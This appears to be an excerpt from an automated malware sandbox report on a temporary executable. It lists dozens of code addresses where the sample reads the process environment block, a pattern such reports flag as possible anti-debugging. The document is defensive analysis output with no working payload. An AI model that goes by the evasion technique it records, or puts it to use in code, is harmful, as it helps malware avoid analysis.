Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_33901380 mov eax, dword ptr fs:[00000030h]	2_2_33901380
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3391F380 mov eax, dword ptr fs:[00000030h]	2_2_3391F380
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3391F380 mov eax, dword ptr fs:[00000030h]	2_2_3391F380
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3391F380 mov eax, dword ptr fs:[00000030h]	2_2_3391F380
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3391F380 mov eax, dword ptr fs:[00000030h]	2_2_3391F380
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3391F380 mov eax, dword ptr fs:[00000030h]	2_2_3391F380
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3391F380 mov eax, dword ptr fs:[00000030h]	2_2_3391F380
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339BF38A mov eax, dword ptr fs:[00000030h]	2_2_339BF38A
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3397C3B0 mov eax, dword ptr fs:[00000030h]	2_2_3397C3B0
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339093A6 mov eax, dword ptr fs:[00000030h]	2_2_339093A6
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339093A6 mov eax, dword ptr fs:[00000030h]	2_2_339093A6
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339333D0 mov eax, dword ptr fs:[00000030h]	2_2_339333D0
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339343D0 mov ecx, dword ptr fs:[00000030h]	2_2_339343D0
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_338FC3C7 mov eax, dword ptr fs:[00000030h]	2_2_338FC3C7
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339843D5 mov eax, dword ptr fs:[00000030h]	2_2_339843D5
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_338FE3C0 mov eax, dword ptr fs:[00000030h]	2_2_338FE3C0
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_338FE3C0 mov eax, dword ptr fs:[00000030h]	2_2_338FE3C0
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_338FE3C0 mov eax, dword ptr fs:[00000030h]	2_2_338FE3C0
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339063CB mov eax, dword ptr fs:[00000030h]	2_2_339063CB
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3391E310 mov eax, dword ptr fs:[00000030h]	2_2_3391E310
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3391E310 mov eax, dword ptr fs:[00000030h]	2_2_3391E310
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3391E310 mov eax, dword ptr fs:[00000030h]	2_2_3391E310
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_338F9303 mov eax, dword ptr fs:[00000030h]	2_2_338F9303
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_338F9303 mov eax, dword ptr fs:[00000030h]	2_2_338F9303
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339BF30A mov eax, dword ptr fs:[00000030h]	2_2_339BF30A
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_338FE328 mov eax, dword ptr fs:[00000030h]	2_2_338FE328
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_338FE328 mov eax, dword ptr fs:[00000030h]	2_2_338FE328
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_338FE328 mov eax, dword ptr fs:[00000030h]	2_2_338FE328
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339D3336 mov eax, dword ptr fs:[00000030h]	2_2_339D3336
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3392332D mov eax, dword ptr fs:[00000030h]	2_2_3392332D
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_338F8347 mov eax, dword ptr fs:[00000030h]	2_2_338F8347
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_338F8347 mov eax, dword ptr fs:[00000030h]	2_2_338F8347
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_338F8347 mov eax, dword ptr fs:[00000030h]	2_2_338F8347
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3397E372 mov eax, dword ptr fs:[00000030h]	2_2_3397E372
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3397E372 mov eax, dword ptr fs:[00000030h]	2_2_3397E372
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3397E372 mov eax, dword ptr fs:[00000030h]	2_2_3397E372
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3397E372 mov eax, dword ptr fs:[00000030h]	2_2_3397E372
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3392237A mov eax, dword ptr fs:[00000030h]	2_2_3392237A
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_33980371 mov eax, dword ptr fs:[00000030h]	2_2_33980371
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_33980371 mov eax, dword ptr fs:[00000030h]	2_2_33980371
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3390B360 mov eax, dword ptr fs:[00000030h]	2_2_3390B360
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3390B360 mov eax, dword ptr fs:[00000030h]	2_2_3390B360
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3390B360 mov eax, dword ptr fs:[00000030h]	2_2_3390B360
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3390B360 mov eax, dword ptr fs:[00000030h]	2_2_3390B360
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3390B360 mov eax, dword ptr fs:[00000030h]	2_2_3390B360
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3390B360 mov eax, dword ptr fs:[00000030h]	2_2_3390B360
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3393E363 mov eax, dword ptr fs:[00000030h]	2_2_3393E363
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3393E363 mov eax, dword ptr fs:[00000030h]	2_2_3393E363
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3393E363 mov eax, dword ptr fs:[00000030h]	2_2_3393E363
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3393E363 mov eax, dword ptr fs:[00000030h]	2_2_3393E363
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3393E363 mov eax, dword ptr fs:[00000030h]	2_2_3393E363
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3393E363 mov eax, dword ptr fs:[00000030h]	2_2_3393E363
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3393E363 mov eax, dword ptr fs:[00000030h]	2_2_3393E363
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3393E363 mov eax, dword ptr fs:[00000030h]	2_2_3393E363
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_33907290 mov eax, dword ptr fs:[00000030h]	2_2_33907290
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_33907290 mov eax, dword ptr fs:[00000030h]	2_2_33907290
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_33907290 mov eax, dword ptr fs:[00000030h]	2_2_33907290
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3397E289 mov eax, dword ptr fs:[00000030h]	2_2_3397E289
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_338F92AF mov eax, dword ptr fs:[00000030h]	2_2_338F92AF
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339DB2BC mov eax, dword ptr fs:[00000030h]	2_2_339DB2BC
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339DB2BC mov eax, dword ptr fs:[00000030h]	2_2_339DB2BC
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339DB2BC mov eax, dword ptr fs:[00000030h]	2_2_339DB2BC
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339DB2BC mov eax, dword ptr fs:[00000030h]	2_2_339DB2BC
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339BF2AE mov eax, dword ptr fs:[00000030h]	2_2_339BF2AE
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339C92AB mov eax, dword ptr fs:[00000030h]	2_2_339C92AB
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339242AF mov eax, dword ptr fs:[00000030h]	2_2_339242AF
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339242AF mov eax, dword ptr fs:[00000030h]	2_2_339242AF
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_338FC2B0 mov ecx, dword ptr fs:[00000030h]	2_2_338FC2B0
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339332C0 mov eax, dword ptr fs:[00000030h]	2_2_339332C0
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339332C0 mov eax, dword ptr fs:[00000030h]	2_2_339332C0
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339D32C9 mov eax, dword ptr fs:[00000030h]	2_2_339D32C9
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339232C5 mov eax, dword ptr fs:[00000030h]	2_2_339232C5
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_338FD2EC mov eax, dword ptr fs:[00000030h]	2_2_338FD2EC
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_338FD2EC mov eax, dword ptr fs:[00000030h]	2_2_338FD2EC
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339102F9 mov eax, dword ptr fs:[00000030h]	2_2_339102F9
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339102F9 mov eax, dword ptr fs:[00000030h]	2_2_339102F9
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339102F9 mov eax, dword ptr fs:[00000030h]	2_2_339102F9
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339102F9 mov eax, dword ptr fs:[00000030h]	2_2_339102F9
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339102F9 mov eax, dword ptr fs:[00000030h]	2_2_339102F9
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339102F9 mov eax, dword ptr fs:[00000030h]	2_2_339102F9
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339102F9 mov eax, dword ptr fs:[00000030h]	2_2_339102F9
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339102F9 mov eax, dword ptr fs:[00000030h]	2_2_339102F9
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_338F72E0 mov eax, dword ptr fs:[00000030h]	2_2_338F72E0
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3390A2E0 mov eax, dword ptr fs:[00000030h]	2_2_3390A2E0
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3390A2E0 mov eax, dword ptr fs:[00000030h]	2_2_3390A2E0
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3390A2E0 mov eax, dword ptr fs:[00000030h]	2_2_3390A2E0
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3390A2E0 mov eax, dword ptr fs:[00000030h]	2_2_3390A2E0
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3390A2E0 mov eax, dword ptr fs:[00000030h]	2_2_3390A2E0
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3390A2E0 mov eax, dword ptr fs:[00000030h]	2_2_3390A2E0
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339082E0 mov eax, dword ptr fs:[00000030h]	2_2_339082E0
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339082E0 mov eax, dword ptr fs:[00000030h]	2_2_339082E0
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339082E0 mov eax, dword ptr fs:[00000030h]	2_2_339082E0
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339082E0 mov eax, dword ptr fs:[00000030h]	2_2_339082E0
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3398B214 mov eax, dword ptr fs:[00000030h]	2_2_3398B214
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3398B214 mov eax, dword ptr fs:[00000030h]	2_2_3398B214
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_338FA200 mov eax, dword ptr fs:[00000030h]	2_2_338FA200
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_338F821B mov eax, dword ptr fs:[00000030h]	2_2_338F821B
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_33920230 mov ecx, dword ptr fs:[00000030h]	2_2_33920230
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3393A22B mov eax, dword ptr fs:[00000030h]	2_2_3393A22B
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3393A22B mov eax, dword ptr fs:[00000030h]	2_2_3393A22B
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3393A22B mov eax, dword ptr fs:[00000030h]	2_2_3393A22B
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_33980227 mov eax, dword ptr fs:[00000030h]	2_2_33980227
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_33980227 mov eax, dword ptr fs:[00000030h]	2_2_33980227
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_33980227 mov eax, dword ptr fs:[00000030h]	2_2_33980227
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3392F24A mov eax, dword ptr fs:[00000030h]	2_2_3392F24A
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339BF247 mov eax, dword ptr fs:[00000030h]	2_2_339BF247
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3399327E mov eax, dword ptr fs:[00000030h]	2_2_3399327E
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3399327E mov eax, dword ptr fs:[00000030h]	2_2_3399327E
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3399327E mov eax, dword ptr fs:[00000030h]	2_2_3399327E
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3399327E mov eax, dword ptr fs:[00000030h]	2_2_3399327E
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3399327E mov eax, dword ptr fs:[00000030h]	2_2_3399327E
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3399327E mov eax, dword ptr fs:[00000030h]	2_2_3399327E
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339BD270 mov eax, dword ptr fs:[00000030h]	2_2_339BD270
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_338FB273 mov eax, dword ptr fs:[00000030h]	2_2_338FB273
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_338FB273 mov eax, dword ptr fs:[00000030h]	2_2_338FB273
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_338FB273 mov eax, dword ptr fs:[00000030h]	2_2_338FB273
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_33941190 mov eax, dword ptr fs:[00000030h]	2_2_33941190
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_33941190 mov eax, dword ptr fs:[00000030h]	2_2_33941190
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_33929194 mov eax, dword ptr fs:[00000030h]	2_2_33929194
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_33904180 mov eax, dword ptr fs:[00000030h]	2_2_33904180
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_33904180 mov eax, dword ptr fs:[00000030h]	2_2_33904180
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_33904180 mov eax, dword ptr fs:[00000030h]	2_2_33904180
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339341BB mov ecx, dword ptr fs:[00000030h]	2_2_339341BB
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339341BB mov eax, dword ptr fs:[00000030h]	2_2_339341BB
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339341BB mov eax, dword ptr fs:[00000030h]	2_2_339341BB
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339D51B6 mov eax, dword ptr fs:[00000030h]	2_2_339D51B6
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339331BE mov eax, dword ptr fs:[00000030h]	2_2_339331BE
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339331BE mov eax, dword ptr fs:[00000030h]	2_2_339331BE
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3393E1A4 mov eax, dword ptr fs:[00000030h]	2_2_3393E1A4
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3393E1A4 mov eax, dword ptr fs:[00000030h]	2_2_3393E1A4
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339101C0 mov eax, dword ptr fs:[00000030h]	2_2_339101C0
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339101C0 mov eax, dword ptr fs:[00000030h]	2_2_339101C0
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339151C0 mov eax, dword ptr fs:[00000030h]	2_2_339151C0
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339151C0 mov eax, dword ptr fs:[00000030h]	2_2_339151C0
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339151C0 mov eax, dword ptr fs:[00000030h]	2_2_339151C0
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339151C0 mov eax, dword ptr fs:[00000030h]	2_2_339151C0
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339101F1 mov eax, dword ptr fs:[00000030h]	2_2_339101F1
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339101F1 mov eax, dword ptr fs:[00000030h]	2_2_339101F1
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339101F1 mov eax, dword ptr fs:[00000030h]	2_2_339101F1
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3392F1F0 mov eax, dword ptr fs:[00000030h]	2_2_3392F1F0
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3392F1F0 mov eax, dword ptr fs:[00000030h]	2_2_3392F1F0
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_338F81EB mov eax, dword ptr fs:[00000030h]	2_2_338F81EB
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339C81EE mov eax, dword ptr fs:[00000030h]	2_2_339C81EE
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339C81EE mov eax, dword ptr fs:[00000030h]	2_2_339C81EE
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3392B1E0 mov eax, dword ptr fs:[00000030h]	2_2_3392B1E0
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3392B1E0 mov eax, dword ptr fs:[00000030h]	2_2_3392B1E0
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3392B1E0 mov eax, dword ptr fs:[00000030h]	2_2_3392B1E0
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3392B1E0 mov eax, dword ptr fs:[00000030h]	2_2_3392B1E0
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3392B1E0 mov eax, dword ptr fs:[00000030h]	2_2_3392B1E0
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3392B1E0 mov eax, dword ptr fs:[00000030h]	2_2_3392B1E0
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3392B1E0 mov eax, dword ptr fs:[00000030h]	2_2_3392B1E0
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3390A1E3 mov eax, dword ptr fs:[00000030h]	2_2_3390A1E3
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3390A1E3 mov eax, dword ptr fs:[00000030h]	2_2_3390A1E3
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3390A1E3 mov eax, dword ptr fs:[00000030h]	2_2_3390A1E3
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3390A1E3 mov eax, dword ptr fs:[00000030h]	2_2_3390A1E3
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3390A1E3 mov eax, dword ptr fs:[00000030h]	2_2_3390A1E3
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339091E5 mov eax, dword ptr fs:[00000030h]	2_2_339091E5
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339091E5 mov eax, dword ptr fs:[00000030h]	2_2_339091E5
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_338F91F0 mov eax, dword ptr fs:[00000030h]	2_2_338F91F0
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_338F91F0 mov eax, dword ptr fs:[00000030h]	2_2_338F91F0
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_33930118 mov eax, dword ptr fs:[00000030h]	2_2_33930118
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_338FF113 mov eax, dword ptr fs:[00000030h]	2_2_338FF113
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_338FF113 mov eax, dword ptr fs:[00000030h]	2_2_338FF113
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_338FF113 mov eax, dword ptr fs:[00000030h]	2_2_338FF113
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_338FF113 mov eax, dword ptr fs:[00000030h]	2_2_338FF113
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_338FF113 mov eax, dword ptr fs:[00000030h]	2_2_338FF113
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_338FF113 mov eax, dword ptr fs:[00000030h]	2_2_338FF113
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_338FF113 mov eax, dword ptr fs:[00000030h]	2_2_338FF113
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_338FF113 mov eax, dword ptr fs:[00000030h]	2_2_338FF113
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_338FF113 mov eax, dword ptr fs:[00000030h]	2_2_338FF113
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_338FF113 mov eax, dword ptr fs:[00000030h]	2_2_338FF113
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_338FF113 mov eax, dword ptr fs:[00000030h]	2_2_338FF113
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_338FF113 mov eax, dword ptr fs:[00000030h]	2_2_338FF113
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_338FF113 mov eax, dword ptr fs:[00000030h]	2_2_338FF113
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_338FF113 mov eax, dword ptr fs:[00000030h]	2_2_338FF113
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_338FF113 mov eax, dword ptr fs:[00000030h]	2_2_338FF113
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_338FF113 mov eax, dword ptr fs:[00000030h]	2_2_338FF113
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_338FF113 mov eax, dword ptr fs:[00000030h]	2_2_338FF113
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_338FF113 mov eax, dword ptr fs:[00000030h]	2_2_338FF113
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_338FF113 mov eax, dword ptr fs:[00000030h]	2_2_338FF113
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_338FF113 mov eax, dword ptr fs:[00000030h]	2_2_338FF113
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_338FF113 mov eax, dword ptr fs:[00000030h]	2_2_338FF113
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3392510F mov eax, dword ptr fs:[00000030h]	2_2_3392510F
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3392510F mov eax, dword ptr fs:[00000030h]	2_2_3392510F
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3392510F mov eax, dword ptr fs:[00000030h]	2_2_3392510F
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3392510F mov eax, dword ptr fs:[00000030h]	2_2_3392510F
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3392510F mov eax, dword ptr fs:[00000030h]	2_2_3392510F
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3392510F mov eax, dword ptr fs:[00000030h]	2_2_3392510F
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3392510F mov eax, dword ptr fs:[00000030h]	2_2_3392510F
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3392510F mov eax, dword ptr fs:[00000030h]	2_2_3392510F
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3392510F mov eax, dword ptr fs:[00000030h]	2_2_3392510F
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3392510F mov eax, dword ptr fs:[00000030h]	2_2_3392510F
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3392510F mov eax, dword ptr fs:[00000030h]	2_2_3392510F
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3392510F mov eax, dword ptr fs:[00000030h]	2_2_3392510F
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3392510F mov eax, dword ptr fs:[00000030h]	2_2_3392510F
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3390510D mov eax, dword ptr fs:[00000030h]	2_2_3390510D
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339BF13E mov eax, dword ptr fs:[00000030h]	2_2_339BF13E
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_33937128 mov eax, dword ptr fs:[00000030h]	2_2_33937128
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_33937128 mov eax, dword ptr fs:[00000030h]	2_2_33937128
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_338FA147 mov eax, dword ptr fs:[00000030h]	2_2_338FA147
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_338FA147 mov eax, dword ptr fs:[00000030h]	2_2_338FA147
